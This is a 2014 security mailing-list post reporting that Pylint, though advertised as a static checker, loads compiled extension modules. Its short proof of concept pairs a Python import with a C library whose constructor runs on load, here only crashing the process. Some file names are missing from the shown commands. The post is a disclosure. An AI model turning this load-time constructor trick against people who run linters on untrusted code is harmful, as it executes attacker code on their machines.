Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 29 Sep 2014 14:32:21 +0200
From: Jakub Wilk <>
Subject: Pylint checks not as static as one would think

Pylint[0] is advertised as "a static code checker, meaning it can 
analyse your code without actually running it"[1] and that it "does 
not import live modules"[1].

This is, unfortunately, far from reality. Here's a PoC:

$ cat
from _moo import *

$ cat moo.c
#include <stdio.h>
#include <signal.h>
void __attribute__((constructor)) moo() {
	kill(0, SIGSEGV);

$ gcc -Wall -shared -fPIC moo.c -o

$ pylint
No config file found, using default configuration
Segmentation fault

My understanding is that upstream Pylint maintainers consider this 
behavior intentional[2]. But even then, I think it's a serious 
documentation flaw.

Should a CVE ID be assigned to this bug? If yes, it should be a 


Jakub Wilk

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ